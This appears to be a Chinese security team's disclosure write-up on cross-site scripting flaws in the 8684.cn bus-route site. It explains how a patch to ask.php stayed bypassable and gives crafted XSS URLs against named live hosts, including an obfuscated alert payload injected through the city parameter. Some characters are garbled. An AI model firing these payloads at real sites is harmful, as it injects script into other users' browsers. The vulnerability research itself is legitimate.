安全修复后的跨站攻击分析 XSS不单是过滤
安全修复后的跨站攻击分析 XSS不单是过滤 篇1
Tosec信息安全团队(www.tosec.cn)
原漏洞
受影响的版本:
仅限8684.CN类似公交程序
描述:
程序查询的时候没有经过严格过来,直接导致跨站漏洞的产生
攻击测试代码beijing.8684.cn/so.php?k=pp&q=test“><”
测试攻击站点beijing.8684.cn/so.php?k=pp&q=test“><”
现漏洞分析:
漏洞页面:ask.php
简要描述:页面对后面的city数据没有严格的规划以致跨站再度产生
测试站点:hi.8684.cn/
问路吧是一个网民对站点路线查询的一个程序,基于UCH开发的,在近日我们已经联系相关人员通知了8684管理修复并开发了相关补丁
经对方程序员描述,目前已经过好相关的过滤,提高了安全性能,于是针对过滤与对方程序员讨论
现继续分析7.15安全修复后的问路吧程序,我们输入以下地址查看原漏洞是否还存在
<“
这个是为什么?如果我们只是输入中进行测试,可能无法检测出来,当时查看源码文件可以知道,其实这里有几个input提交,只要对其它的一个进行重新构造,那么就能触发新的XSS漏洞
相关文档:
blog.tosec.cn//?action=show&id=8
blog.tosec.cn//?action=show&id=1
相关攻击语句的构造:
hi.8684.cn/ask.php?q=”>al/**/ert(/x/**/ss/)<“&searchsubmit=%CB%D1%CB%F7%B4%F0%B0%B8&type=2&city=beijing”>“><”
hi.8684.cn/ask.php?q=“>al/**/ert(/x/**/ss/)<”&searchsubmit=%CB%D1%CB%F7%B4%F0%B0%B8&type=2&city=beijing“>”>javascript:攻击代码><
【安全修复后的跨站攻击分析 XSS不单是过滤】推荐阅读:
道路修复安全协议09-27
污染土壤修复技术分析10-05
河流生态修复技术分析10-08
安全过滤07-27
心理修复07-21
黏结修复05-18
资源修复05-31
现场修复06-12
牙龈修复06-21
修复研究06-27